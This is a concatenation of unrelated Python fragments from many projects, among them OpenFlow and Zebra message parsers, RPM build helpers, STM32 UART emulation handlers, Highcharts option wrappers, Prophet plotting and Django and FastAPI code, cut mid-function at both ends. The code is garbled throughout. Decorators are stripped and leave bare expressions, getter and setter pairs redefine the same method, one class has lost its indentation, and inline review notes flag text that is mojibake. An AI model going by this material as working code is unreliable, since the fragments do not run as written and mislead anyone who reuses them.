            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class TestLabel():
    """Serializer fields must carry the ``label`` they were declared with."""

    def setup_method(self):
        class TestSerializer(serializers.Serializer):
            labeled = serializers.IntegerField(label='My label')

        self.serializer = TestSerializer()

    def test_label(self):
        assert self.serializer.fields['labeled'].label == 'My label'
def load_packages_and_modules(ss: SerializationSettings, project_root: Path, pkgs_or_mods: typing.List[str], options: typing.Optional[Options]=None) -> typing.List[FlyteControlPlaneEntity]:
    """Serialize the Flyte entities found in the given packages/modules.

    Each path is converted into a dotted module name relative to
    ``project_root`` before serialization.
    """
    ss.git_repo = _get_git_repo_url(project_root)
    dotted_names = []
    for entry in pkgs_or_mods:
        relative = Path(entry).resolve().relative_to(project_root)
        dotted = os.path.splitext(relative)[0].replace(os.path.sep, '.')
        logger.debug(f'User specified arg {entry} has {str(relative)} relative path loading it as {dotted}')
        dotted_names.append(dotted)
    return serialize(dotted_names, ss, str(project_root), options)
class TestActionController(unittest.TestCase):
    """Tests for the default ActionController behaviour."""

    def setUp(self):
        # Record perform() invocations in self.memo.
        self.memo = []

        def perform():
            self.memo.append('called')
        self.action = Action(name='Test', on_perform=perform)
        self.action_controller = ActionController()

    def test_perform(self):
        """perform() delegates to the action's on_perform callback."""
        event = ActionEvent()
        self.action_controller.perform(self.action, event)
        self.assertEqual(self.memo, ['called'])

    def test_perform_none(self):
        """perform() on an action without on_perform must not raise."""
        action = Action(name='Test')
        event = ActionEvent()
        self.action_controller.perform(action, event)

    def test_can_add_to_menu(self):
        result = self.action_controller.can_add_to_menu(self.action)
        self.assertTrue(result)

    def test_add_to_menu(self):
        # Should not raise.
        self.action_controller.add_to_menu(self.action)

    def test_can_add_to_toolbar(self):
        result = self.action_controller.can_add_to_toolbar(self.action)
        self.assertTrue(result)

    def test_add_to_toolbar(self):
        # Should not raise.
        self.action_controller.add_to_toolbar(self.action)
_stats_reply_type(ofproto.OFPST_GROUP)  # NOTE(review): likely a stripped class decorator
class OFPGroupStats(StringifyMixin):
    """OFPST_GROUP stats body: group counters plus per-bucket counters.

    NOTE(review): ``parser`` uses ``cls`` -- looks like a stripped
    ``@classmethod``.
    """

    def __init__(self, group_id, ref_count, packet_count, byte_count, bucket_counters, length=None):
        super(OFPGroupStats, self).__init__()
        self.group_id = group_id
        self.ref_count = ref_count
        self.packet_count = packet_count
        self.byte_count = byte_count
        self.bucket_counters = bucket_counters
        self.length = length

    def parser(cls, buf, offset):
        """Parse one group-stats entry (and its bucket counters) from ``buf``."""
        (length, group_id, ref_count, packet_count, byte_count) = struct.unpack_from(ofproto.OFP_GROUP_STATS_PACK_STR, buf, offset)
        # Remaining bytes after the fixed header are bucket counters.
        bucket_len = (length - ofproto.OFP_GROUP_STATS_SIZE)
        offset += ofproto.OFP_GROUP_STATS_SIZE
        bucket_counters = []
        while (bucket_len > 0):
            bucket_counters.append(OFPBucketCounter.parser(buf, offset))
            offset += ofproto.OFP_BUCKET_COUNTER_SIZE
            bucket_len -= ofproto.OFP_BUCKET_COUNTER_SIZE
        o = cls(group_id, ref_count, packet_count, byte_count, bucket_counters)
        o.length = length
        return o
def _expand_window_ragged(model: Model[(InT, InT)], Xr: Ragged) -> Tuple[(Ragged, Callable)]:
    """Expand each row to a window of its neighbours (seq2col) over ragged data.

    Returns the expanded Ragged plus a backprop callback reversing the
    expansion.  The window size comes from ``model.attrs['window_size']``.
    """
    nW = model.attrs['window_size']
    Y = Ragged(model.ops.seq2col(cast(Floats2d, Xr.data), nW, lengths=Xr.lengths), Xr.lengths)

    def backprop(dYr: Ragged) -> Ragged:
        # Gradient of seq2col with the same window and lengths.
        return Ragged(model.ops.backprop_seq2col(cast(Floats2d, dYr.data), nW, lengths=Xr.lengths), Xr.lengths)
    return (Y, backprop)
# Register the fallback body class for unknown message types.
_FrrZebraMessageBody.register_unknown_type()
_ZebraMessageBody.register_unknown_type()


class ZebraUnknownMessage(_ZebraMessageBody):
    """Fallback body for Zebra messages of unknown type: keeps the raw bytes.

    NOTE(review): ``parse`` takes ``cls`` -- looks like a stripped
    ``@classmethod``.
    """

    def __init__(self, buf):
        super(ZebraUnknownMessage, self).__init__()
        # Raw, unparsed payload.
        self.buf = buf

    def parse(cls, buf, version=_DEFAULT_VERSION):
        return cls(buf)

    def serialize(self, version=_DEFAULT_VERSION):
        # Round-trips the original bytes unchanged.
        return self.buf
def test_expected_mocking_and_stubbing_fixtures_ooo():
    """Golden-list test: pin the exact order of fixture/mock/stub lifecycle
    hooks recorded across the mocking and stubbing test modules."""
    assert (fixtures_test_module.TestMockingAndStubbingFixtures.get_order_of_operations() == ['setup_class', 'set_up_test_fixture', 'setup_method', 'set_up_test_case.mocking_test.simple_mock_works', 'set_up_test_case_action.mocking_test.simple_mock_works.mocking_test', 'tear_down_test_case_action.mocking_test.simple_mock_works.mocking_test', 'tear_down_test_case.mocking_test.simple_mock_works', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_randint_exception', 'set_up_test_case_action.mocking_test.mock_randint_exception.mocking_test', 'tear_down_test_case_action.mocking_test.mock_randint_exception.mocking_test', 'tear_down_test_case.mocking_test.mock_randint_exception', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_function_exception', 'set_up_test_case_action.mocking_test.mock_function_exception.mocking_test', 'tear_down_test_case_action.mocking_test.mock_function_exception.mocking_test', 'tear_down_test_case.mocking_test.mock_function_exception', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_delete', 'set_up_test_case_action.mocking_test.mock_delete.mocking_test', 'tear_down_test_case_action.mocking_test.mock_delete.mocking_test', 'tear_down_test_case.mocking_test.mock_delete', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_at_test_level_with_multiple_actions', 'set_up_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'set_up_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'set_up_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 
        'tear_down_test_case.mocking_test.mock_at_test_level_with_multiple_actions', 'teardown_method', 'tear_down_test_fixture', 'set_up_test_fixture', 'setup_method', 'set_up_test_case.stubbing_test.simple_stub_works', 'set_up_test_case_action.stubbing_test.simple_stub_works.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.simple_stub_works.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.simple_stub_works', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.simple_error_works', 'set_up_test_case_action.stubbing_test.simple_error_works.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.simple_error_works.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.simple_error_works', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.simple_field_error_works', 'set_up_test_case_action.stubbing_test.simple_field_error_works.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.simple_field_error_works.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.simple_field_error_works', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.one_stub_multiple_calls', 'set_up_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.one_stub_multiple_calls', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.one_error_stub_multiple_error_calls', 
        'set_up_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.one_error_stub_multiple_error_calls', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.multiple_stubs_multiple_calls', 'set_up_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.multiple_stubs_multiple_calls', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.multiple_stubs_one_call', 'set_up_test_case_action.stubbing_test.multiple_stubs_one_call.stubbing_test_two_actions', 'tear_down_test_case_action.stubbing_test.multiple_stubs_one_call.stubbing_test_two_actions', 'tear_down_test_case.stubbing_test.multiple_stubs_one_call', 'teardown_method', 'tear_down_test_fixture', 'teardown_class'])
def _get_section_label_and_title_text_from_layout_block(layout_block: LayoutBlock) -> Tuple[(Optional[str], str)]:
    """Return ``(label_text_or_None, title_text)`` for a section heading block."""
    label_block, title_block = get_section_label_and_title_from_layout_block(layout_block)
    label_text = _get_layout_block_text(label_block)
    return (label_text, title_block.text)
class RpmBuild(Build):
    """Build subclass for RPM content, with koji-backed helpers."""
    # Default epoch when koji has not been consulted yet.
    epoch = Column(Integer, default=0)
    __mapper_args__ = {'polymorphic_identity': ContentType.rpm}

    def evr(self):
        """Return the (epoch, version, release) tuple as strings.

        NOTE(review): ``get_latest`` below reads ``self.evr`` without calling
        it, which suggests this was originally an ``@property`` (decorator
        appears stripped in this copy) -- confirm against upstream.
        """
        if (not self.epoch):
            # Lazily fill the epoch from koji build info.
            self.epoch = self._get_kojiinfo()['epoch']
        if (not self.epoch):
            self.epoch = 0
        return (str(self.epoch), str(self.nvr_version), str(self.nvr_release))

    def get_latest(self):
        """Return the NVR of the newest tagged build older than this one, or None."""
        koji_session = buildsys.get_session()
        latest = None
        evr = self.evr
        # Check the stable tag first, then fall back to the dist tag.
        for tag in [self.release.stable_tag, self.release.dist_tag]:
            builds = koji_session.listTagged(tag, package=self.package.name, inherit=True)
            for build in builds:
                old_evr = build_evr(build)
                if (rpm.labelCompare(evr, old_evr) > 0):
                    latest = build['nvr']
                    break
            if latest:
                break
        return latest

    def get_changelog(self, timelimit=0, lastupdate=False):
        """Return formatted changelog entries newer than ``timelimit``.

        When ``lastupdate`` is True, the time limit is taken from the newest
        changelog entry of the previously tagged build instead.
        """
        rpm_header = get_rpm_header(self.nvr)
        descrip = rpm_header['changelogtext']
        if (not descrip):
            return ''
        who = rpm_header['changelogname']
        when = rpm_header['changelogtime']
        num = len(descrip)
        if (not isinstance(when, list)):
            when = [when]
        if lastupdate:
            lastpkg = self.get_latest()
            if (lastpkg is not None):
                oldh = get_rpm_header(lastpkg)
                if oldh['changelogtext']:
                    timelimit = oldh['changelogtime']
                    if isinstance(timelimit, list):
                        timelimit = timelimit[0]
        # BUG FIX: the accumulator was previously named ``str``, shadowing the
        # builtin; renamed to ``changelog``.
        changelog = ''
        i = 0
        while ((i < num) and (when[i] > timelimit)):
            try:
                changelog += ('* %s %s\n%s\n' % (time.strftime('%a %b %e %Y', time.localtime(when[i])), who[i], descrip[i]))
            except Exception:
                # Skip malformed entries but keep the rest of the changelog.
                log.exception('Unable to add changelog entry for header %s', rpm_header)
            i += 1
        return changelog
class bsn_bw_enable_get_request(bsn_header):
    """Generated-style loxi message: BSN bandwidth-enable get request.

    NOTE(review): ``unpack`` takes only ``reader`` -- it looks like a stripped
    ``@staticmethod``.
    """
    version = 6             # OpenFlow wire version
    type = 4                # experimenter message type
    experimenter = 6035143  # Big Switch Networks experimenter ID
    subtype = 19

    def __init__(self, xid=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        return

    def pack(self):
        """Serialize to wire format; the length field is patched in last."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder (index 2)
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        """Deserialize from ``reader``; asserts all fixed header fields."""
        obj = bsn_bw_enable_get_request()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 4)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Restrict further reads to this message's length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 6035143)
        _subtype = reader.read('!L')[0]
        assert (_subtype == 19)
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        return True

    def pretty_print(self, q):
        """Human-readable dump through the pretty-printer ``q``."""
        q.text('bsn_bw_enable_get_request {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
            q.breakable()
        q.text('}')
_meta(characters.reimu.ReimuExterminateLaunchCard)  # NOTE(review): likely a stripped decorator call
class ReimuExterminateLaunchCard():
    """UI metadata for Reimu's Exterminate launch card (text + voice lines).

    NOTE(review): the f-string texts below look garbled/mojibake in this copy
    (originally non-ASCII game text); left byte-identical.
    """

    def effect_string_before(self, act):
        # Different flavour text depending on whether triggered by damage.
        if (act.cause == 'damage'):
            return f'{N.char(act.source)}: ()( !!!'
        else:
            return f'{N.char(act.target)},{N.char(act.source)}!'

    def sound_effect(self, act):
        # Matching voice line for each trigger cause.
        if (act.cause == 'damage'):
            return 'thb-cv-reimu_exterminate_damage'
        else:
            return 'thb-cv-reimu_exterminate_active'
class Window(QtWidgets.QDialog, QtWidgets.QPlainTextEdit):
    """Qt dialog presenting a live EEGsynth log view.

    NOTE(review): relies on module-level ``winx``/``winy``/``winwidth``/
    ``winheight`` and ``patch`` defined elsewhere in the file.
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.setGeometry(winx, winy, winwidth, winheight)
        self.setWindowTitle(patch.getstring('display', 'title', default='EEGsynth logging'))
        layout = QtWidgets.QVBoxLayout()
        logTextBox = QTextEditLogger_v2(self)
        layout.addWidget(logTextBox.widget)
        # Expose the log widget's append() directly on the window.
        self.append = logTextBox.append
        self.setLayout(layout)
class STM32F4UART(BPHandler):
    """Breakpoint handlers emulating the STM32F4 HAL UART API.

    NOTE(review): the bare ``_handler([...])`` calls between methods look like
    stripped decorators that register each handler for the listed HAL symbols.
    """

    def __init__(self, impl=UARTPublisher):
        # Backing model providing the UART data stream.
        self.model = impl
    _handler(['HAL_UART_Init'])

    def hal_ok(self, qemu, bp_addr):
        """Intercept HAL_UART_Init: report success (0 == HAL_OK)."""
        log.info('Init Called')
        return (True, 0)
    _handler(['HAL_UART_GetState'])

    def get_state(self, qemu, bp_addr):
        """Intercept HAL_UART_GetState: report ready state (32 == 0x20)."""
        log.info('Get State')
        return (True, 32)
    _handler(['HAL_UART_Transmit', 'HAL_UART_Transmit_IT', 'HAL_UART_Transmit_DMA'])

    def handle_tx(self, qemu, bp_addr):
        """Forward the guest's TX buffer to the model; return success."""
        huart = qemu.get_arg(0)
        # First word of the UART handle struct is the HW instance address.
        hw_addr = qemu.read_memory(huart, 4, 1)
        buf_addr = qemu.get_arg(1)
        buf_len = qemu.get_arg(2)
        data = qemu.read_memory(buf_addr, 1, buf_len, raw=True)
        hal_log.info(('UART %i TX:%s' % (hw_addr, data)))
        self.model.write(hw_addr, data)
        return (True, 0)
    _handler(['HAL_UART_Receive', 'HAL_UART_Receive_IT', 'HAL_UART_Receive_DMA'])

    def handle_rx(self, qemu, bp_handler):
        """Block for RX data from the model and copy it into the guest buffer."""
        huart = qemu.get_arg(0)
        hw_addr = qemu.read_memory(huart, 4, 1)
        size = qemu.get_arg(2)
        log.info(('Waiting for data: %i' % size))
        data = self.model.read(hw_addr, size, block=True)
        hal_log.info(('UART %i RX: %s' % (hw_addr, data)))
        qemu.write_memory(qemu.get_arg(1), 1, data, size, raw=True)
        return (True, 0)
class XLSStyle():
    """Bundle of optional cell styling attributes for XLS output.

    NOTE(review): ``style()`` formats ``self.excel_number_format`` without
    calling it -- ``excel_number_format`` was likely an ``@property`` before
    decorators were stripped; preserved as-is.
    """

    def __init__(self, bold=False, color=None, bgcolor=None, wrap=False, border=None, number_format=None, font_size=None, centre=False, shrink_to_fit=False):
        self.bold = bold
        self.color = color
        self.bgcolor = bgcolor
        self.wrap = wrap
        self.border = border
        self.number_format = number_format
        self.font_size = font_size
        self.centre = centre
        self.shrink_to_fit = shrink_to_fit

    def __nonzero__(self):
        # Python 2 compatibility shim.
        return self.__bool__()

    def __bool__(self):
        # Truthy when any styling attribute is set.
        return (self.bold
                or (self.color is not None)
                or (self.bgcolor is not None)
                or self.wrap
                or (self.border is not None)
                or (self.number_format is not None)
                or (self.font_size is not None)
                or self.centre
                or self.shrink_to_fit)

    def name(self):
        """Return a ``__token__``-style identifier for this style ('' if unstyled)."""
        # (label, value, takes_a_value) in output order.
        spec = (
            ('bold', self.bold, False),
            ('color', self.color, True),
            ('bgcolor', self.bgcolor, True),
            ('wrap', self.wrap, False),
            ('border', self.border, True),
            ('number_format', self.number_format, True),
            ('font_size', self.font_size, True),
            ('centre', self.centre, False),
            ('shrink_to_fit', self.shrink_to_fit, False),
        )
        tokens = []
        for label, value, takes_value in spec:
            if takes_value:
                if value is not None:
                    tokens.append('%s=%s' % (label, value))
            elif value:
                tokens.append(label)
        joined = '__'.join(tokens)
        return ('__%s__' % joined) if joined else ''

    def style(self, item):
        """Wrap ``item`` in a ``<style ...>`` tag when any styling is set."""
        parts = []
        if self.bold:
            parts.append('font=bold')
        if self.color is not None:
            parts.append('color=%s' % self.color)
        if self.bgcolor is not None:
            parts.append('bgcolor=%s' % self.bgcolor)
        if self.wrap:
            parts.append('wrap')
        if self.border is not None:
            parts.append('border=%s' % self.border)
        if self.number_format is not None:
            # Intentionally formats excel_number_format, not number_format.
            parts.append('number_format=%s' % self.excel_number_format)
        if self.font_size is not None:
            parts.append('font_size=%s' % self.font_size)
        if self.centre:
            parts.append('centre')
        if self.shrink_to_fit:
            parts.append('shrink_to_fit')
        if not parts:
            return item
        return '<style %s>%s</style>' % (' '.join(parts), item)

    def excel_number_format(self):
        """Excel format string for the configured number format (None if unset)."""
        if self.number_format == NumberFormats.THOUSAND_SEPARATOR:
            return '#,###'
        if self.number_format == NumberFormats.PERCENTAGE:
            return '0.0%'
        return None
class Command(BaseCommand):
help = 'Update DABS Submission Window Schedule table based on a file or the broker'
def add_arguments(self, parser):
parser.add_argument('--file', help='The file containing schdules. If not provided, schedules are generated based on broker.')
()
def handle(self, *args, **options):
file_path = options['file']
if file_path:
logger.info('Input file provided. Reading schedule from file.')
incoming_schedule_objs = self.read_schedules_from_csv(file_path)
else:
logger.info('No input file provided. Generating schedule from broker.')
incoming_schedule_objs = self.generate_schedules_from_broker()
logger.info('Loading existing DABS Submission Window Schedules')
existing_schedules = list(DABSSubmissionWindowSchedule.objects.all())
existing_schedule_lookup = {}
for schedule in existing_schedules:
existing_schedule_lookup[schedule.id] = schedule
for incoming_schedule in incoming_schedule_objs:
existing_schedule = existing_schedule_lookup.get(int(incoming_schedule.id))
if existing_schedule:
incoming_schedule.submission_reveal_date = existing_schedule.submission_reveal_date
elif (incoming_schedule.submission_reveal_date is None):
incoming_schedule.submission_reveal_date = FUTURE_DATE
incoming_schedule.parse_dates_fields(timezone.utc)
if (incoming_schedule.submission_due_date > datetime.utcnow().replace(tzinfo=timezone.utc)):
incoming_schedule.submission_reveal_date = FUTURE_DATE
logger.info('Deleting existing DABS Submission Window Schedule')
DABSSubmissionWindowSchedule.objects.all().delete()
logger.info('Inserting DABS Submission Window Schedule into website')
DABSSubmissionWindowSchedule.objects.bulk_create(incoming_schedule_objs)
logger.info('DABS Submission Window Schedule loader finished successfully!')
def generate_schedules_from_broker(self):
logger.info('Creating broker cursor')
broker_cursor = connections['data_broker'].cursor()
logger.info('Running MONTH_SCHEDULE_SQL')
broker_cursor.execute(MONTH_SCHEDULE_SQL)
logger.info('Getting month schedule values from cursor')
month_schedule_values = dictfetchall(broker_cursor)
logger.info('Running QUARTER_SCHEDULE_SQL')
broker_cursor.execute(QUARTER_SCHEDULE_SQL)
logger.info('Getting quarter schedule values from cursor')
quarter_schedule_values = dictfetchall(broker_cursor)
submission_schedule_objs = [DABSSubmissionWindowSchedule(**values) for values in month_schedule_values]
submission_schedule_objs += [DABSSubmissionWindowSchedule(**values) for values in quarter_schedule_values]
return submission_schedule_objs
def read_schedules_from_csv(self, file_path):
    """Build unsaved DABSSubmissionWindowSchedule objects from a CSV at *file_path*.

    The file may be a local path or URI; each CSV row's columns are passed as
    keyword arguments to the model constructor.
    """
    logger.info('Reading from file: {}'.format(file_path))
    with RetrieveFileFromUri(file_path).get_file_object(True) as csv_file:
        # Materialize rows inside the `with` so the reader isn't used on a closed file.
        rows = list(csv.DictReader(csv_file))
    return [DABSSubmissionWindowSchedule(**row) for row in rows]
class OptionSeriesPackedbubbleSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
    """Option wrapper for the Highcharts `series.packedbubble.sonification.
    defaultInstrumentOptions.mapping.highpassFrequency` group.

    NOTE(review): every accessor below is defined twice (getter form then
    setter form); the original @property / @<name>.setter decorators appear
    to have been stripped during extraction — confirm against the generator
    output before relying on plain-call semantics.
    """
    def mapFunction(self):
        # Custom mapping function for the frequency value (no default).
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        # Data point property the frequency is mapped to (no default).
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        # Upper bound of the mapped range (no default).
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        # Lower bound of the mapped range (no default).
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        # What data scope the mapping is computed within (no default).
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class IPv4Address(BaseV4, BaseIP):
    """A single IPv4 address.

    Accepts an integer (host value), a packed 4-byte string (only when the
    runtime has real ``bytes``), or a dotted-quad string. Raises
    IPv4IpValidationError for anything that doesn't parse/validate.
    """
    def __init__(self, address):
        # Let the base classes record the raw input first.
        BaseIP.__init__(self, address)
        BaseV4.__init__(self, address)
        if isinstance(address, int):
            # Integer form: must fit in 32 bits (0 .. _ALL_ONES).
            self._ip = address
            if ((address < 0) or (address > self._ALL_ONES)):
                raise IPv4IpValidationError(address)
            return
        if _compat_has_real_bytes:
            # Packed binary form: exactly four network-order bytes.
            if (isinstance(address, bytes) and (len(address) == 4)):
                self._ip = struct.unpack('!I', address)[0]
                return
        # Fall back to parsing a dotted-quad string representation.
        addr_str = str(address)
        if (not self._is_valid_ip(addr_str)):
            raise IPv4IpValidationError(addr_str)
        self._ip = self._ip_int_from_string(addr_str)
def plot_components(m, fcst, uncertainty=True, plot_cap=True, weekly_start=0, yearly_start=0, figsize=None):
    """Plot the forecast components (trend, holidays, seasonalities, regressors).

    Args:
        m: the fitted model.
        fcst: forecast DataFrame whose columns name the components to plot.
        uncertainty: whether to draw uncertainty intervals.
        plot_cap: whether to draw the cap line on the trend panel.
        weekly_start / yearly_start: day offsets for the weekly/yearly panels.
        figsize: optional (width, height); defaults to 9 x (3 * panels).

    Returns:
        The matplotlib figure containing one axis per component.
    """
    # Collect, in plot order, the component columns present in the forecast.
    components = ['trend']
    if ((m.train_holiday_names is not None) and ('holidays' in fcst)):
        components.append('holidays')
    if (('weekly' in m.seasonalities) and ('weekly' in fcst)):
        components.append('weekly')
    if (('yearly' in m.seasonalities) and ('yearly' in fcst)):
        components.append('yearly')
    components.extend([name for name in sorted(m.seasonalities) if ((name in fcst) and (name not in ['weekly', 'yearly']))])
    # Add one aggregate panel per extra-regressor mode actually in use.
    regressors = {'additive': False, 'multiplicative': False}
    for (name, props) in m.extra_regressors.items():
        regressors[props['mode']] = True
    for mode in ['additive', 'multiplicative']:
        if (regressors[mode] and ('extra_regressors_{}'.format(mode) in fcst)):
            components.append('extra_regressors_{}'.format(mode))
    npanel = len(components)
    figsize = (figsize if figsize else (9, (3 * npanel)))
    (fig, axes) = plt.subplots(npanel, 1, facecolor='w', figsize=figsize)
    if (npanel == 1):
        axes = [axes]
    multiplicative_axes = []
    # Smallest non-zero spacing of the history; used below to decide whether
    # the data is daily (and the weekly-style plot therefore applicable).
    dt = m.history['ds'].diff()
    min_dt = dt.iloc[dt.values.nonzero()[0]].min()
    for (ax, plot_name) in zip(axes, components):
        if (plot_name == 'trend'):
            plot_forecast_component(m=m, fcst=fcst, name='trend', ax=ax, uncertainty=uncertainty, plot_cap=plot_cap)
        elif (plot_name in m.seasonalities):
            # Weekly-style plot only for 7-day-period seasonality on daily data.
            if (((plot_name == 'weekly') or (m.seasonalities[plot_name]['period'] == 7)) and (min_dt == pd.Timedelta(days=1))):
                plot_weekly(m=m, name=plot_name, ax=ax, uncertainty=uncertainty, weekly_start=weekly_start)
            elif ((plot_name == 'yearly') or (m.seasonalities[plot_name]['period'] == 365.25)):
                plot_yearly(m=m, name=plot_name, ax=ax, uncertainty=uncertainty, yearly_start=yearly_start)
            else:
                plot_seasonality(m=m, name=plot_name, ax=ax, uncertainty=uncertainty)
        elif (plot_name in ['holidays', 'extra_regressors_additive', 'extra_regressors_multiplicative']):
            plot_forecast_component(m=m, fcst=fcst, name=plot_name, ax=ax, uncertainty=uncertainty, plot_cap=False)
        if (plot_name in m.component_modes['multiplicative']):
            multiplicative_axes.append(ax)
    fig.tight_layout()
    # Re-label multiplicative panels as percentages.
    for ax in multiplicative_axes:
        ax = set_y_as_percent(ax)
    return fig
def test_registering_with_the_decorator_is_working_properly(prepare_publishers):
    """Registering a callable via the publisher decorator stores it under its name."""
    # NOTE(review): the bare ('Test') expression below is almost certainly the
    # residue of a stripped decorator (e.g. @register('Test')) — confirm in VCS.
    ('Test')
    def some_callable():
        pass
    assert ('test' in publishers[PRE_PUBLISHER_TYPE])
    assert isinstance(publishers[PRE_PUBLISHER_TYPE]['test'], list)
    assert (publishers[PRE_PUBLISHER_TYPE]['test'][0] == some_callable)
def checkFocus(image_path):
    """Classify an image as blurry or usable via the variance of its Laplacian.

    Appends the file name to the module-level ``rejected_images`` or
    ``usable_images`` list and, when ``display_focus_check`` is set, shows
    the annotated image. ``threshold`` is a module-level cutoff.
    """
    image = cv2.imread(str(image_path))
    # Downscale to 15% before measuring focus to keep the check fast.
    scale_percent = 15
    new_size = (int(image.shape[1] * scale_percent / 100), int(image.shape[0] * scale_percent / 100))
    resized = cv2.resize(image, new_size, interpolation=cv2.INTER_AREA)
    fm = variance_of_laplacian(cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY))
    if fm < threshold:
        text, color_text = 'BLURRY', (0, 0, 255)
        rejected_images.append(image_path.name)
    else:
        text, color_text = 'NOT Blurry', (255, 0, 0)
        usable_images.append(image_path.name)
    print(image_path.name, 'is', text)
    if display_focus_check:
        cv2.putText(resized, '{}: {:.2f}'.format(text, fm), (10, 30), cv2.FONT_HERSHEY_DUPLEX, 0.8, color_text, 3)
        cv2.imshow('Image', resized)
        cv2.waitKey(1)
def advanced_search(cls, search, include):
    """Run an advanced search and return objs/rules/truncation flag/analyse URL.

    NOTE(review): the leading `cls` parameter suggests this was decorated
    @classmethod in the original source — confirm.
    """
    rules = build_rules(search)
    query_obj = build_query_obj(cls, search)
    queryset = cls.objects
    # Each "include" flag disables one of the default queryset filters.
    if 'invalid' not in include:
        queryset = queryset.valid()
    if 'unavailable' not in include:
        queryset = queryset.available()
    if 'no_bnf_code' not in include:
        queryset = queryset.with_bnf_code()
    # Fetch one row beyond the 10,000 cap so truncation can be detected.
    objs = queryset.filter(query_obj)[:10001]
    too_many_results = len(objs) == 10001
    if too_many_results:
        objs = objs[:10000]
        analyse_url = None
    else:
        analyse_url = _build_analyse_url(objs)
    return {'objs': objs, 'rules': rules, 'too_many_results': too_many_results, 'analyse_url': analyse_url}
def post(client, **kwargs):
    """POST a disaster spending-by-geography request assembled from kwargs.

    Truthy ``def_codes``/``award_type_codes`` go into the ``filter`` object
    (always present, possibly empty); the remaining recognised keys are set
    at the top level only when truthy. Returns the client's response.
    """
    url = '/api/v2/disaster/spending_by_geography/'
    filters = {key: kwargs[key] for key in ('def_codes', 'award_type_codes') if kwargs.get(key)}
    request_body = {'filter': filters}
    for key in ('geo_layer', 'geo_layer_filters', 'spending_type', 'scope'):
        if kwargs.get(key):
            request_body[key] = kwargs[key]
    return client.post(url, content_type='application/json', data=json.dumps(request_body))
('/posts', response_model=Page[schemas.Posts], dependencies=[Depends(pagination_params)])
def list_posts(response: Response, db: Session=Depends(get_db), user_id: Optional[int]=None) -> Any:
db_user = ''
if user_id:
db_user = get_user_by_id(db=db, user_id=user_id)
